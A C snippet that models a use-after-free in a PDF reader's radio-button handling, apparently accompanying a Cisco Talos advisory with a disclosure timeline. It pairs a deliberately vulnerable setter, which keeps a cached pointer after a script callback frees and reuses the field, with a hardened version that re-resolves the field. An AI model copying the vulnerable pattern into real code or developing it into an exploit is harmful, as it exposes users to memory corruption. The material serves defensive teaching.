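```c
#include <stdint.h>
#include <string.h>

/* Field type tags as described in the advisory: the first 4 bytes of a field
 * object hold 1 (Push Button), 2 (Radio Button) or 3 (Check Box). */
enum { FIELD_PUSH_BUTTON = 1, FIELD_RADIO_BUTTON = 2, FIELD_CHECK_BOX = 3 };

/* Hypothetical per-field options block; n_choices plays the role of the
 * divisor loaded from [esi+8] at the crash site. */
typedef struct { uint32_t flags; uint32_t selected; uint32_t n_choices; } Options;

/* Hypothetical radio button object: type tag first, then the pointer that the
 * value setter dereferences (the member loaded into esi at [6]/[7]). */
typedef struct { uint32_t type; uint32_t reserved; Options *opts; } RadioField;

/* Hypothetical string object the allocator may place in the freed slot;
 * its character data begins at the same offset as RadioField.opts. */
typedef struct { uint32_t refcount; uint32_t length; char data[40]; } StringObj;

/* One allocation that is a RadioField until it is freed and reused. */
typedef union { RadioField field; StringObj str; } Slot;

/* Minimal document: named fields; a NULL slot means the field was destroyed. */
#define MAX_FIELDS 4
typedef struct { const char *names[MAX_FIELDS]; Slot *slots[MAX_FIELDS]; } Document;

typedef void (*calculate_cb)(Document *doc, Slot *self);

static Slot *find_field(Document *doc, const char *name) {
    for (int i = 0; i < MAX_FIELDS; i++)
        if (doc->names[i] && strcmp(doc->names[i], name) == 0) return doc->slots[i];
    return NULL;
}

/* Models the PoC's delete_pages() Calculate action: the field is torn down
 * and its memory handed out again, here to a string object whose text
 * mirrors what the advisory observes at [5]. */
static void delete_pages_cb(Document *doc, Slot *self) {
    for (int i = 0; i < MAX_FIELDS; i++)
        if (doc->slots[i] == self) doc->slots[i] = NULL;
    memset(self, 0, sizeof *self);
    self->str.refcount = 1;
    self->str.length = 31;
    strcpy(self->str.data, "Ribbon_Category_PostScanOptions");
}

/* A Calculate action with no side effects, for the normal path. */
static void noop_cb(Document *doc, Slot *self) { (void)doc; (void)self; }

/* Vulnerable shape: check the tag once, run the script callback, then keep
 * using the pointer cached before the callback. Rather than dereferencing
 * rf->opts (the "div eax,dword ptr [esi+8]" crash), this copies the raw
 * pointer bytes it would have used into would_deref for inspection. */
static int set_value_vulnerable(Document *doc, const char *name, calculate_cb cb,
                                unsigned char would_deref[sizeof(void *)]) {
    Slot *slot = find_field(doc, name);
    if (!slot || slot->field.type != FIELD_RADIO_BUTTON) return -1;
    RadioField *rf = &slot->field;        /* cached, never revalidated */
    cb(doc, slot);
    memcpy(would_deref, &rf->opts, sizeof(void *));
    return 0;
}

/* Hardened shape: after the callback, resolve the field again and re-check its
 * type tag before touching any member. The tag check alone is a heuristic
 * (reused memory could happen to hold a 2); the re-lookup is what actually
 * catches a destroyed object. */
static int set_value_hardened(Document *doc, const char *name, int value, calculate_cb cb) {
    Slot *slot = find_field(doc, name);
    if (!slot || slot->field.type != FIELD_RADIO_BUTTON) return -1;
    cb(doc, slot);
    slot = find_field(doc, name);          /* re-resolve after the script ran */
    if (!slot || slot->field.type != FIELD_RADIO_BUTTON) return -1;
    Options *o = slot->field.opts;
    if (!o || o->n_choices == 0) return -1;
    return value % (int)o->n_choices;
}

/* Builds the constructed sample document: one radio button with 4 choices. */
static void make_doc(Document *doc, Slot *slot, Options *opts) {
    memset(doc, 0, sizeof *doc);
    memset(slot, 0, sizeof *slot);
    opts->flags = 0; opts->selected = 0; opts->n_choices = 4;
    slot->field.type = FIELD_RADIO_BUTTON;
    slot->field.opts = opts;
    doc->names[0] = "Radio Button0";
    doc->slots[0] = slot;
}
```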
2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release
Discovered by Kamlapati Choubey of Cisco Talos.